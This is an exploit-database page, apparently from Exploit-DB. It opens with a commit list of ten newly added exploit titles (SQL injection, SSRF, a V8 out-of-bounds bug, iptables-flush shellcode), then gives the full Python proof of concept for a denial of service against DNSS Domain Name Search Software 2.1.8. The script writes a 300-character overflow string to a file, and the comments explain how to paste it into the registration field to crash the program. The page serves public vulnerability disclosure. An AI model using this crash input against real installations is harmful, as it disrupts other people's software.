945107caf5
10 changes to exploits/shellcodes SpotMSN 2.4.6 - Denial of Service (PoC) DNSS 2.1.8 - Denial of Service (PoC) Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery SOCA Access Control System 180612 - Information Disclosure SOCA Access Control System 180612 - SQL Injection SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin) XOOPS 2.5.9 - SQL Injection OpenProject 5.0.0 - 8.3.1 - SQL Injection Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
22 lines
No EOL
684 B
Python
Executable file
22 lines
No EOL
684 B
Python
Executable file
#Exploit Title: DNSS Domain Name Search Software 2.1.8 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-05-12
|
|
#Vendor Homepage: www.nsauditor.com
|
|
#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
|
|
#Tested Version: 2.1.8
|
|
#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: DNSS_2.1.8.py
|
|
#2.- Open DNSS.txt and copy content to clipboard
|
|
#3.- Open Dnss
|
|
#4.- Select "Register" > "Enter Registration Code..."
|
|
#5.- In "Name/Key" paste Clipboard
|
|
#6.- Click "Ok"
|
|
#7.- Crarshed
|
|
|
|
cod = "\x41" * 300
|
|
|
|
f = open('DNSS.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |